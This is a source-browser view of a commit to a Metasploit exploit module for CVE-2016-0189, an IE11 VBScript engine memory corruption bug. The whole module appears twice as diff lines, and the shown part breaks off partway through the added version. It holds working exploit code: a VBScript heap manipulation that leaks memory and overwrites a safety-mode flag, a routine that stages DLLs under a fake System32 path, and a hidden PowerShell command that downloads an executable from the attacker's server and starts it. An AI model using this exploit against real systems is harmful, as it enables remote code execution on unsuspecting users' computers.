Browse Source

msftidy cleanup

William Webb 3 years ago
parent
commit
ba0da52274
1 changed files with 496 additions and 494 deletions
  1. 496
    494
      modules/exploits/windows/browser/ms16_051_vbscript.rb

+ 496
- 494
modules/exploits/windows/browser/ms16_051_vbscript.rb View File

@@ -1,494 +1,496 @@
1
-##
2
-# This module requires Metasploit: http//metasploit.com/download
3
-# Current source: https://github.com/rapid7/metasploit-framework
4
-##
5
-
6
-require 'msf/core'
7
-
8
-class MetasploitModule < Msf::Exploit::Remote
9
-  Rank = NormalRanking
10
-
11
-  include Msf::Exploit::Remote::HttpServer
12
-  include Msf::Exploit::EXE
13
-
14
-  def initialize(info={})
15
-    super(update_info(info,
16
-      'Name'           => "template",
17
-      'Description'    => %q{
18
-        This module exploits the memory corruption vulnerability (CVE-2016-0189)
19
-        present in the VBScript engine of Internet Explorer 11.
20
-      },
21
-      'License'        => MSF_LICENSE,
22
-      'Author'         => [ 
23
-          'Theori',                                              # Original RE research and exploitation
24
-          'William Webb <william_webb[at]rapid7.com>'            # Metasploit module
25
-        ],
26
-      'Platform'       => 'win',
27
-      'BrowserRequirements' =>
28
-         {
29
-           :source => /script|headers/i,
30
-           :os_name => OperatingSystems::Match::WINDOWS,
31
-           :ua_name => HttpClients::IE,
32
-           :ua_ver => '11.0'
33
-         },
34
-      'Targets'        =>
35
-        [
36
-          [ 'Automatic', {} ],
37
-          [
38
-            'Windows 10 with IE 11',
39
-            {
40
-              'os_flavor' => '10',
41
-              'ua_name'   => 'MSIE',
42
-              'ua_ver'    => '11.0'
43
-            }
44
-          ]
45
-        ],
46
-      'References'     =>
47
-        [
48
-          [ 'CVE', '2016-0189' ],
49
-          [ 'MSB', 'MS16-051' ]
50
-        ],
51
-      'Arch'           => ARCH_X86_64,
52
-      'DefaultTarget'  => 0))
53
-  end
54
-
55
-  def setup
56
-    # @stage2html = Rex::Text.rand_text_alphanum(6)
57
-    @ieshell          = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ieshell32.dll uri
58
-    @localsrv         = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ielocalserver.dll uri
59
-    @pm_escape_html   = "#{Rex::Text.rand_text_alphanumeric(6)}"       # vbscipt_godmode.html
60
-    @payload_uri      = "#{Rex::Text.rand_text_alphanumeric(8)}"
61
-    @payload_exe      = "#{Rex::Text.rand_text_alpha(6)}.exe"
62
-    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ieshell32.dll" ), "rb") { |f| @stage2dll = f.read }
63
-    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ielocalserver.dll" ), "rb") { |f| @localserver = f.read }
64
-    super
65
-  end
66
-
67
-  def exploit_html(req_uri)
68
-    srvhost = datastore['SRVHOST']
69
-    srvport = datastore['SRVPORT']
70
-
71
-    template = <<-EOF
72
-    <html>
73
-    <head>
74
-    <meta http-equiv="x-ua-compatible" content="IE=10">
75
-    </head>
76
-    <body>
77
-
78
-        <script type="text/vbscript">
79
-            Dim downloadFiles
80
-            Dim cacheRegex
81
-            Dim cacheFiles(3)
82
-
83
-            Dim downloadState
84
-            Dim pinTime
85
-
86
-            Dim oFSO
87
-            Dim oWS
88
-            Dim shell
89
-
90
-            function FindFile(path, regexFile)
91
-                FindFile = ""
92
-                For Each f in oFSO.GetFolder(path).Files
93
-                    If regexFile.Test(f.Name) Then
94
-                        FindFile = f.Name
95
-                        Exit For
96
-                    End If
97
-                Next
98
-            end function
99
-
100
-            function SearchCache(path, regexFile)
101
-                SearchCache = ""
102
-                For Each fld in oFSO.GetFolder(path).SubFolders
103
-                    'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then
104
-                        filename = FindFile(path & "\\" & fld.Name, regexFile)
105
-                        If filename <> "" Then
106
-                            SearchCache = path & "\\" & fld.Name & "\\" & filename
107
-                            Exit For
108
-                        End If
109
-                    'End If
110
-                Next
111
-            end function
112
-
113
-            function loaddll()
114
-                On Error Resume Next
115
-
116
-                Set wshSystemEnv = oWS.Environment("Process")
117
-                tmpDir = oFSO.GetSpecialFolder(2)
118
-
119
-                tmpSysDir = tmpDir & "\\System32"
120
-                tmpShellFile = tmpSysDir & "\\shell32.dll"
121
-                oFSO.CreateFolder(tmpSysDir)
122
-                oFSO.MoveFile cacheFiles(0), tmpShellFile
123
-
124
-                mydllFile = tmpDir & "\\" & downloadFiles(1)
125
-                oFSO.MoveFile cacheFiles(1), mydllFile
126
-                wshSystemEnv("MyDllPath") = mydllFile
127
-
128
-                If (UBound(downloadFiles) = 2) Then
129
-                    stage2File = tmpDir & "\\#{@pm_escape_html}.html"
130
-                    oFSO.MoveFile cacheFiles(2), stage2File
131
-                    wshSystemEnv("stage2file") = stage2File
132
-                End If
133
-
134
-                saveRoot = wshSystemEnv("SystemRoot")
135
-                wshSystemEnv("SaveSystemRoot") = saveRoot
136
-                wshSystemEnv("SystemRoot") = tmpDir
137
-                Set shell = CreateObject("Shell.Application")
138
-
139
-                If (UBound(downloadFiles) = 2) Then
140
-                    call tolocal()
141
-                End If
142
-            end function
143
-
144
-            Sub OnDownloadDone()
145
-                If InStr(userAgent, "NT 5.") > 0 Then
146
-                    cacheDir = oWS.ExpandEnvironmentStrings("%USERPROFILE%")
147
-                    cacheDir = cacheDir & "\\Local Settings\\Temporary Internet Files\\Low\\IE"
148
-                Else
149
-                    cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%")
150
-                    cacheDir = cacheDir & "\\Microsoft\\Windows\\Temporary Internet Files\\Low\\IE"
151
-                End If
152
-
153
-                Set regexFile = new regexp
154
-                regexFile.Pattern = cacheRegex(downloadState)
155
-                cacheFiles(downloadState) = SearchCache(cacheDir, regexFile)
156
-                If cacheFiles(downloadState) = "" Then
157
-                    Exit Sub
158
-                End If
159
-
160
-                If downloadState = UBound(downloadFiles) Then
161
-                    loaddll()
162
-                Else
163
-                    downloadState = downloadState + 1
164
-                    DoDownload()
165
-                End If
166
-            End Sub
167
-
168
-            Sub DoDownload()
169
-                pinTime = Now
170
-                call getdll(downloadFiles(downloadState))
171
-            End Sub
172
-
173
-        Sub runshell()
174
-            downloadFiles = Array("#{@ieshell}.dll", "#{@localsrv}.dll", "#{@pm_escape_html}.html")
175
-            cacheRegex = Array("^#{@ieshell}\\[\\d\\].dll$", "^#{@localsrv}\\[\\d\\].dll$", "^#{@pm_escape_html}\\[\\d\\].htm$")
176
-            Set oFSO = CreateObject("Scripting.FileSystemObject")
177
-            Set oWS = CreateObject("WScript.Shell")
178
-            downloadState = 0
179
-            DoDownload()
180
-        End Sub
181
-
182
-        </script>
183
-
184
-        <script type="text/vbscript">
185
-            Dim bl
186
-            Dim plunge(32)
187
-            Dim y(32)
188
-            prefix = "%u4141%u4141"
189
-            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
190
-            b = String(64000, "D")
191
-            c = d & b
192
-            x = UnEscape(c)
193
-
194
-            Class ArrayWrapper
195
-                Dim A
196
-
197
-                Private Sub Class_Initialize
198
-                    ReDim Preserve AA(1, 2000)
199
-                    A = AA
200
-                End Sub
201
-
202
-                Public Sub Resize()
203
-                    ReDim Preserve A(1, 1)
204
-                End Sub
205
-            End Class
206
-
207
-            Class Spray
208
-            End Class
209
-
210
-
211
-            Function getAddr (arg1, s)
212
-          bl = Null
213
-          Set bl = New ArrayWrapper
214
-
215
-          For i = 0 To 32
216
-            Set plunge(i) = s
217
-          Next
218
-
219
-                Set bl.A(arg1, 2) = s
220
-
221
-          Dim addr
222
-                Dim i
223
-                For i = 0 To 31
224
-                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
225
-                        addr = strToInt(Mid(y(i), 3 + 4, 2))
226
-                    End If
227
-            y(i) = Null
228
-                Next
229
-
230
-          If addr = Null Then
231
-            document.location.href = document.location.href
232
-            Return
233
-          End If
234
-
235
-          getAddr = addr
236
-        End Function
237
-
238
-        Function leakMem (arg1, addr)
239
-          d = prefix & "%u0008%u4141%u4141%u4141"
240
-                c = d & intToStr(addr) & b
241
-                x = UnEscape(c)
242
-
243
-          bl = Null
244
-                Set bl = New ArrayWrapper
245
-
246
-                Dim o
247
-                o = bl.A(arg1, 2)
248
-
249
-          leakMem = o
250
-        End Function
251
-
252
-        Sub overwrite (arg1, addr)
253
-          d = prefix & "%u400C%u0000%u0000%u0000"
254
-                c = d & intToStr(addr) & b
255
-                x = UnEscape(c)
256
-
257
-          bl = Null
258
-                Set bl = New ArrayWrapper
259
-                bl.A(arg1, 2) = CSng(0)
260
-        End Sub
261
-
262
-            Function exploit (arg1)
263
-                Dim addr
264
-                Dim csession
265
-                Dim olescript
266
-                Dim mem
267
-
268
-          Set sp = New Spray
269
-          addr = getAddr(arg1, sp)
270
-          mem = leakMem(arg1, addr + 8)
271
-          csession = strToInt(Mid(mem, 3, 2))
272
-          mem = leakMem(arg1, csession + 4)
273
-          olescript = strToInt(Mid(mem, 1, 2))
274
-          overwrite arg1, olescript + &H174
275
-          runshell()
276
-
277
-        End Function
278
-
279
-            Function triggerBug
280
-                bl.Resize()
281
-
282
-                Dim i
283
-                For i = 0 To 32
284
-                    y(i) = Mid(x, 1, 24000)
285
-                Next
286
-            End Function
287
-        </script>
288
-
289
-        <script type="text/javascript">
290
-            var userAgent = navigator.userAgent;
291
-            var oReq;
292
-            function getdll(downloadFile)
293
-            {
294
-                oReq = new XMLHttpRequest();
295
-                oReq.open("GET", "http://#{srvhost}:#{srvport}#{req_uri}/"+downloadFile, true);
296
-                oReq.onreadystatechange = handler;
297
-                oReq.send();
298
-            }
299
-            function handler()
300
-            {
301
-                if (oReq.readyState == 4 && oReq.status == 200) {
302
-                    OnDownloadDone();
303
-                }
304
-            }
305
-            function tolocal()
306
-            {
307
-                location.href = "http://localhost:5555/#{@pm_escape_html}.html";
308
-            }
309
-            function strToInt(s)
310
-            {
311
-                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
312
-            }
313
-            function intToStr(x)
314
-            {
315
-                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
316
-            }
317
-            var o;
318
-            o = {"valueOf": function () {
319
-                    triggerBug();
320
-                    return 1;
321
-                }};
322
-            setTimeout(function() {exploit(o);}, 50);
323
-        </script>
324
-    </body>
325
-    </html>
326
-        EOF
327
-
328
-    template 
329
-  end
330
-
331
-  def stage2_html(req_uri)
332
-
333
-    template = <<-EOF
334
-    <html>
335
-    <head>
336
-    <meta http-equiv="x-ua-compatible" content="IE=10">
337
-    </head>
338
-    <body>
339
-        <script type="text/vbscript">
340
-            Dim aw
341
-            Dim plunge(32)
342
-            Dim y(32)
343
-            prefix = "%u4141%u4141"
344
-            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
345
-            b = String(64000, "D")
346
-            c = d & b
347
-            x = UnEscape(c)
348
-
349
-            Class ArrayWrapper
350
-                Dim A()
351
-                Private Sub Class_Initialize
352
-                    ReDim Preserve A(1, 2000)
353
-                End Sub
354
-
355
-                Public Sub Resize()
356
-                    ReDim Preserve A(1, 1)
357
-                End Sub
358
-            End Class
359
-
360
-            Class Dummy
361
-            End Class
362
-
363
-            Function getAddr (arg1, s)
364
-                aw = Null
365
-                Set aw = New ArrayWrapper
366
-
367
-                For i = 0 To 32
368
-                    Set plunge(i) = s
369
-                Next
370
-
371
-                Set aw.A(arg1, 2) = s
372
-
373
-                Dim addr
374
-                Dim i
375
-                For i = 0 To 31
376
-                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
377
-                        addr = strToInt(Mid(y(i), 3 + 4, 2))
378
-                    End If
379
-                    y(i) = Null
380
-                Next
381
-
382
-                If addr = Null Then
383
-                    document.location.href = document.location.href
384
-                    Return
385
-                End If
386
-
387
-                getAddr = addr
388
-            End Function
389
-
390
-            Function leakMem (arg1, addr)
391
-                d = prefix & "%u0008%u4141%u4141%u4141"
392
-                c = d & intToStr(addr) & b
393
-                x = UnEscape(c)
394
-
395
-                aw = Null
396
-                Set aw = New ArrayWrapper
397
-
398
-                Dim o
399
-                o = aw.A(arg1, 2)
400
-
401
-                leakMem = o
402
-            End Function
403
-
404
-            Sub overwrite (arg1, addr)
405
-                d = prefix & "%u400C%u0000%u0000%u0000"
406
-                c = d & intToStr(addr) & b
407
-                x = UnEscape(c)
408
-
409
-                aw = Null
410
-                Set aw = New ArrayWrapper
411
-                aw.A(arg1, 2) = CSng(0)
412
-            End Sub
413
-
414
-            Function exploit (arg1)
415
-                Dim addr
416
-                Dim csession
417
-                Dim olescript
418
-                Dim mem
419
-
420
-                Set dm = New Dummy
421
-                addr = getAddr(arg1, dm)
422
-                mem = leakMem(arg1, addr + 8)
423
-                csession = strToInt(Mid(mem, 3, 2))
424
-                mem = leakMem(arg1, csession + 4)
425
-                olescript = strToInt(Mid(mem, 1, 2))
426
-                overwrite arg1, olescript + &H174
427
-
428
-                Set shObj = CreateObject("Wscript.shell")
429
-                shObj.Run("PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'\\#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d")
430
-                shObj.Run("%temp%\\#{@payload_exe}")
431
-
432
-            End Function
433
-
434
-            Function triggerBug
435
-                aw.Resize()
436
-
437
-                Dim i
438
-                For i = 0 To 32
439
-                    y(i) = Mid(x, 1, 24000)
440
-                Next
441
-            End Function
442
-        </script>
443
-
444
-        <script type="text/javascript">
445
-            function strToInt(s)
446
-            {
447
-                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
448
-            }
449
-            function intToStr(x)
450
-            {
451
-                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
452
-            }
453
-            var o;
454
-            o = {"valueOf": function () {
455
-                    triggerBug();
456
-                    return 1;
457
-                }};
458
-            setTimeout(function() {exploit(o);}, 50);
459
-        </script>
460
-    </body>
461
-    </html>
462
-
463
-      EOF
464
-      template
465
-  end
466
-
467
-  def on_request_uri(cli, request)
468
-    # used for some debugging stuff 
469
-    ies = @ieshell
470
-    ls  = @localsrv
471
-    pm  = @pm_escape_html
472
-
473
-    print_status("Received request: #{request.uri}")
474
-      if request.uri =~ /.*#{ies}.*$/
475
-        print_status("Sending stage two DLL ...")
476
-        send_response(cli, @stage2dll, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
477
-      elsif request.uri =~ /.*#{ls}.*$/
478
-        print_status("Sending local server DLL ...")
479
-        send_response(cli, @localserver, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
480
-      elsif request.uri =~ /.*#{pm}.*$/
481
-        rq = "#{get_resource.chomp('/')}"
482
-        gm = stage2_html(rq)
483
-        send_response(cli, gm, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
484
-      elsif request.uri =~ /.*#{@payload_uri}$/
485
-        return if ((payload = regenerate_payload(cli)) == nil)
486
-        print_status("Sending payload ...")
487
-        send_response(cli, generate_payload_exe({ :code => payload.encoded }), { 'Content-Type' => 'application/octet-stream', 'Connection' => 'close' })
488
-      else
489
-        print_status("Sending main page ..")
490
-        send_response(cli, exploit_html(request.uri))
491
-      end
492
-  end
493
-
494
-end
1
+##
2
+# This module requires Metasploit: http://metasploit.com/download
3
+# Current source: https://github.com/rapid7/metasploit-framework
4
+##
5
+
6
+require 'msf/core'
7
+
8
+class MetasploitModule < Msf::Exploit::Remote
9
+  Rank = NormalRanking
10
+
11
+  include Msf::Exploit::Remote::HttpServer
12
+  include Msf::Exploit::EXE
13
+
14
+  def initialize(info={})
15
+    super(update_info(info,
16
+      'Name'           => "Internet Explorer 11 VBScript Engine Memory Corruption",
17
+      'Description'    => %q{
18
+        This module exploits the memory corruption vulnerability (CVE-2016-0189)
19
+        present in the VBScript engine of Internet Explorer 11.
20
+      },
21
+      'License'        => MSF_LICENSE,
22
+      'Author'         => [
23
+          'Theori',                                              # Original RE research and exploitation
24
+          'William Webb <william_webb[at]rapid7.com>'            # Metasploit module
25
+        ],
26
+      'Platform'       => 'win',
27
+      'BrowserRequirements' =>
28
+         {
29
+           :source => /script|headers/i,
30
+           :os_name => OperatingSystems::Match::WINDOWS,
31
+           :ua_name => HttpClients::IE,
32
+           :ua_ver => '11.0'
33
+         },
34
+      'Targets'        =>
35
+        [
36
+          [ 'Automatic', {} ],
37
+          [
38
+            'Windows 10 with IE 11',
39
+            {
40
+              'os_flavor' => '10',
41
+              'ua_name'   => 'MSIE',
42
+              'ua_ver'    => '11.0'
43
+            }
44
+          ]
45
+        ],
46
+      'References'     =>
47
+        [
48
+          [ 'CVE', '2016-0189' ],
49
+          [ 'MSB', 'MS16-051' ]
50
+        ],
51
+      'Arch'           => ARCH_X86_64,
52
+      'DisclosureDate' => "May 10 2016",
53
+      'DefaultTarget'  => 0))
54
+  end
55
+
56
+  def setup
57
+    # @stage2html = Rex::Text.rand_text_alphanum(6)
58
+    @ieshell          = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ieshell32.dll uri
59
+    @localsrv         = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ielocalserver.dll uri
60
+    @pm_escape_html   = "#{Rex::Text.rand_text_alphanumeric(6)}"       # vbscipt_godmode.html
61
+    @payload_uri      = "#{Rex::Text.rand_text_alphanumeric(8)}"
62
+    @payload_exe      = "#{Rex::Text.rand_text_alpha(6)}.exe"
63
+    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ieshell32.dll" ), "rb") { |f| @stage2dll = f.read }
64
+    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ielocalserver.dll" ), "rb") { |f| @localserver = f.read }
65
+    super
66
+  end
67
+
68
+  def exploit_html(req_uri)
69
+    srvhost = datastore['SRVHOST']
70
+    srvport = datastore['SRVPORT']
71
+
72
+    template = <<-EOF
73
+    <html>
74
+    <head>
75
+    <meta http-equiv="x-ua-compatible" content="IE=10">
76
+    </head>
77
+    <body>
78
+
79
+        <script type="text/vbscript">
80
+            Dim downloadFiles
81
+            Dim cacheRegex
82
+            Dim cacheFiles(3)
83
+
84
+            Dim downloadState
85
+            Dim pinTime
86
+
87
+            Dim oFSO
88
+            Dim oWS
89
+            Dim shell
90
+
91
+            function FindFile(path, regexFile)
92
+                FindFile = ""
93
+                For Each f in oFSO.GetFolder(path).Files
94
+                    If regexFile.Test(f.Name) Then
95
+                        FindFile = f.Name
96
+                        Exit For
97
+                    End If
98
+                Next
99
+            end function
100
+
101
+            function SearchCache(path, regexFile)
102
+                SearchCache = ""
103
+                For Each fld in oFSO.GetFolder(path).SubFolders
104
+                    'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then
105
+                        filename = FindFile(path & "\\" & fld.Name, regexFile)
106
+                        If filename <> "" Then
107
+                            SearchCache = path & "\\" & fld.Name & "\\" & filename
108
+                            Exit For
109
+                        End If
110
+                    'End If
111
+                Next
112
+            end function
113
+
114
+            function loaddll()
115
+                On Error Resume Next
116
+
117
+                Set wshSystemEnv = oWS.Environment("Process")
118
+                tmpDir = oFSO.GetSpecialFolder(2)
119
+
120
+                tmpSysDir = tmpDir & "\\System32"
121
+                tmpShellFile = tmpSysDir & "\\shell32.dll"
122
+                oFSO.CreateFolder(tmpSysDir)
123
+                oFSO.MoveFile cacheFiles(0), tmpShellFile
124
+
125
+                mydllFile = tmpDir & "\\" & downloadFiles(1)
126
+                oFSO.MoveFile cacheFiles(1), mydllFile
127
+                wshSystemEnv("MyDllPath") = mydllFile
128
+
129
+                If (UBound(downloadFiles) = 2) Then
130
+                    stage2File = tmpDir & "\\#{@pm_escape_html}.html"
131
+                    oFSO.MoveFile cacheFiles(2), stage2File
132
+                    wshSystemEnv("stage2file") = stage2File
133
+                End If
134
+
135
+                saveRoot = wshSystemEnv("SystemRoot")
136
+                wshSystemEnv("SaveSystemRoot") = saveRoot
137
+                wshSystemEnv("SystemRoot") = tmpDir
138
+                Set shell = CreateObject("Shell.Application")
139
+
140
+                If (UBound(downloadFiles) = 2) Then
141
+                    call tolocal()
142
+                End If
143
+            end function
144
+
145
+            Sub OnDownloadDone()
146
+                If InStr(userAgent, "NT 5.") > 0 Then
147
+                    cacheDir = oWS.ExpandEnvironmentStrings("%USERPROFILE%")
148
+                    cacheDir = cacheDir & "\\Local Settings\\Temporary Internet Files\\Low\\IE"
149
+                Else
150
+                    cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%")
151
+                    cacheDir = cacheDir & "\\Microsoft\\Windows\\Temporary Internet Files\\Low\\IE"
152
+                End If
153
+
154
+                Set regexFile = new regexp
155
+                regexFile.Pattern = cacheRegex(downloadState)
156
+                cacheFiles(downloadState) = SearchCache(cacheDir, regexFile)
157
+                If cacheFiles(downloadState) = "" Then
158
+                    Exit Sub
159
+                End If
160
+
161
+                If downloadState = UBound(downloadFiles) Then
162
+                    loaddll()
163
+                Else
164
+                    downloadState = downloadState + 1
165
+                    DoDownload()
166
+                End If
167
+            End Sub
168
+
169
+            Sub DoDownload()
170
+                pinTime = Now
171
+                call getdll(downloadFiles(downloadState))
172
+            End Sub
173
+
174
+        Sub runshell()
175
+            downloadFiles = Array("#{@ieshell}.dll", "#{@localsrv}.dll", "#{@pm_escape_html}.html")
176
+            cacheRegex = Array("^#{@ieshell}\\[\\d\\].dll$", "^#{@localsrv}\\[\\d\\].dll$", "^#{@pm_escape_html}\\[\\d\\].htm$")
177
+            Set oFSO = CreateObject("Scripting.FileSystemObject")
178
+            Set oWS = CreateObject("WScript.Shell")
179
+            downloadState = 0
180
+            DoDownload()
181
+        End Sub
182
+
183
+        </script>
184
+
185
+        <script type="text/vbscript">
186
+            Dim bl
187
+            Dim plunge(32)
188
+            Dim y(32)
189
+            prefix = "%u4141%u4141"
190
+            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
191
+            b = String(64000, "D")
192
+            c = d & b
193
+            x = UnEscape(c)
194
+
195
+            Class ArrayWrapper
196
+                Dim A
197
+
198
+                Private Sub Class_Initialize
199
+                    ReDim Preserve AA(1, 2000)
200
+                    A = AA
201
+                End Sub
202
+
203
+                Public Sub Resize()
204
+                    ReDim Preserve A(1, 1)
205
+                End Sub
206
+            End Class
207
+
208
+            Class Spray
209
+            End Class
210
+
211
+
212
+            Function getAddr (arg1, s)
213
+          bl = Null
214
+          Set bl = New ArrayWrapper
215
+
216
+          For i = 0 To 32
217
+            Set plunge(i) = s
218
+          Next
219
+
220
+                Set bl.A(arg1, 2) = s
221
+
222
+          Dim addr
223
+                Dim i
224
+                For i = 0 To 31
225
+                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
226
+                        addr = strToInt(Mid(y(i), 3 + 4, 2))
227
+                    End If
228
+            y(i) = Null
229
+                Next
230
+
231
+          If addr = Null Then
232
+            document.location.href = document.location.href
233
+            Return
234
+          End If
235
+
236
+          getAddr = addr
237
+        End Function
238
+
239
+        Function leakMem (arg1, addr)
240
+          d = prefix & "%u0008%u4141%u4141%u4141"
241
+                c = d & intToStr(addr) & b
242
+                x = UnEscape(c)
243
+
244
+          bl = Null
245
+                Set bl = New ArrayWrapper
246
+
247
+                Dim o
248
+                o = bl.A(arg1, 2)
249
+
250
+          leakMem = o
251
+        End Function
252
+
253
+        Sub overwrite (arg1, addr)
254
+          d = prefix & "%u400C%u0000%u0000%u0000"
255
+                c = d & intToStr(addr) & b
256
+                x = UnEscape(c)
257
+
258
+          bl = Null
259
+                Set bl = New ArrayWrapper
260
+                bl.A(arg1, 2) = CSng(0)
261
+        End Sub
262
+
263
+            Function exploit (arg1)
264
+                Dim addr
265
+                Dim csession
266
+                Dim olescript
267
+                Dim mem
268
+
269
+          Set sp = New Spray
270
+          addr = getAddr(arg1, sp)
271
+          mem = leakMem(arg1, addr + 8)
272
+          csession = strToInt(Mid(mem, 3, 2))
273
+          mem = leakMem(arg1, csession + 4)
274
+          olescript = strToInt(Mid(mem, 1, 2))
275
+          overwrite arg1, olescript + &H174
276
+          runshell()
277
+
278
+        End Function
279
+
280
+            Function triggerBug
281
+                bl.Resize()
282
+
283
+                Dim i
284
+                For i = 0 To 32
285
+                    y(i) = Mid(x, 1, 24000)
286
+                Next
287
+            End Function
288
+        </script>
289
+
290
+        <script type="text/javascript">
291
+            var userAgent = navigator.userAgent;
292
+            var oReq;
293
+            function getdll(downloadFile)
294
+            {
295
+                oReq = new XMLHttpRequest();
296
+                oReq.open("GET", "http://#{srvhost}:#{srvport}#{req_uri}/"+downloadFile, true);
297
+                oReq.onreadystatechange = handler;
298
+                oReq.send();
299
+            }
300
+            function handler()
301
+            {
302
+                if (oReq.readyState == 4 && oReq.status == 200) {
303
+                    OnDownloadDone();
304
+                }
305
+            }
306
+            function tolocal()
307
+            {
308
+                location.href = "http://localhost:5555/#{@pm_escape_html}.html";
309
+            }
310
+            function strToInt(s)
311
+            {
312
+                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
313
+            }
314
+            function intToStr(x)
315
+            {
316
+                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
317
+            }
318
+            var o;
319
+            o = {"valueOf": function () {
320
+                    triggerBug();
321
+                    return 1;
322
+                }};
323
+            setTimeout(function() {exploit(o);}, 50);
324
+        </script>
325
+    </body>
326
+    </html>
327
+        EOF
328
+
329
+    template
330
+  end
331
+
332
+  def stage2_html(req_uri)
333
+
334
+    template = <<-EOF
335
+    <html>
336
+    <head>
337
+    <meta http-equiv="x-ua-compatible" content="IE=10">
338
+    </head>
339
+    <body>
340
+        <script type="text/vbscript">
341
+            Dim aw
342
+            Dim plunge(32)
343
+            Dim y(32)
344
+            prefix = "%u4141%u4141"
345
+            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
346
+            b = String(64000, "D")
347
+            c = d & b
348
+            x = UnEscape(c)
349
+
350
+            Class ArrayWrapper
351
+                Dim A()
352
+                Private Sub Class_Initialize
353
+                    ReDim Preserve A(1, 2000)
354
+                End Sub
355
+
356
+                Public Sub Resize()
357
+                    ReDim Preserve A(1, 1)
358
+                End Sub
359
+            End Class
360
+
361
+            Class Dummy
362
+            End Class
363
+
364
+            Function getAddr (arg1, s)
365
+                aw = Null
366
+                Set aw = New ArrayWrapper
367
+
368
+                For i = 0 To 32
369
+                    Set plunge(i) = s
370
+                Next
371
+
372
+                Set aw.A(arg1, 2) = s
373
+
374
+                Dim addr
375
+                Dim i
376
+                For i = 0 To 31
377
+                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
378
+                        addr = strToInt(Mid(y(i), 3 + 4, 2))
379
+                    End If
380
+                    y(i) = Null
381
+                Next
382
+
383
+                If addr = Null Then
384
+                    document.location.href = document.location.href
385
+                    Return
386
+                End If
387
+
388
+                getAddr = addr
389
+            End Function
390
+
391
+            Function leakMem (arg1, addr)
392
+                d = prefix & "%u0008%u4141%u4141%u4141"
393
+                c = d & intToStr(addr) & b
394
+                x = UnEscape(c)
395
+
396
+                aw = Null
397
+                Set aw = New ArrayWrapper
398
+
399
+                Dim o
400
+                o = aw.A(arg1, 2)
401
+
402
+                leakMem = o
403
+            End Function
404
+
405
+            Sub overwrite (arg1, addr)
406
+                d = prefix & "%u400C%u0000%u0000%u0000"
407
+                c = d & intToStr(addr) & b
408
+                x = UnEscape(c)
409
+
410
+                aw = Null
411
+                Set aw = New ArrayWrapper
412
+                aw.A(arg1, 2) = CSng(0)
413
+            End Sub
414
+
415
+            Function exploit (arg1)
416
+                Dim addr
417
+                Dim csession
418
+                Dim olescript
419
+                Dim mem
420
+
421
+                Set dm = New Dummy
422
+                addr = getAddr(arg1, dm)
423
+                mem = leakMem(arg1, addr + 8)
424
+                csession = strToInt(Mid(mem, 3, 2))
425
+                mem = leakMem(arg1, csession + 4)
426
+                olescript = strToInt(Mid(mem, 1, 2))
427
+                overwrite arg1, olescript + &H174
428
+
429
+                Set shObj = CreateObject("Wscript.shell")
430
+                shObj.Run("PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'\\#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d")
431
+                shObj.Run("%temp%\\#{@payload_exe}")
432
+
433
+            End Function
434
+
435
+            Function triggerBug
436
+                aw.Resize()
437
+
438
+                Dim i
439
+                For i = 0 To 32
440
+                    y(i) = Mid(x, 1, 24000)
441
+                Next
442
+            End Function
443
+        </script>
444
+
445
+        <script type="text/javascript">
446
+            function strToInt(s)
447
+            {
448
+                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
449
+            }
450
+            function intToStr(x)
451
+            {
452
+                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
453
+            }
454
+            var o;
455
+            o = {"valueOf": function () {
456
+                    triggerBug();
457
+                    return 1;
458
+                }};
459
+            setTimeout(function() {exploit(o);}, 50);
460
+        </script>
461
+    </body>
462
+    </html>
463
+
464
+      EOF
465
+      template
466
+  end
467
+
468
+  def on_request_uri(cli, request)
469
+    # used for some debugging stuff
470
+    ies = @ieshell
471
+    ls  = @localsrv
472
+    pm  = @pm_escape_html
473
+
474
+    print_status("Received request: #{request.uri}")
475
+      if request.uri =~ /.*#{ies}.*$/
476
+        print_status("Sending stage two DLL ...")
477
+        send_response(cli, @stage2dll, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
478
+      elsif request.uri =~ /.*#{ls}.*$/
479
+        print_status("Sending local server DLL ...")
480
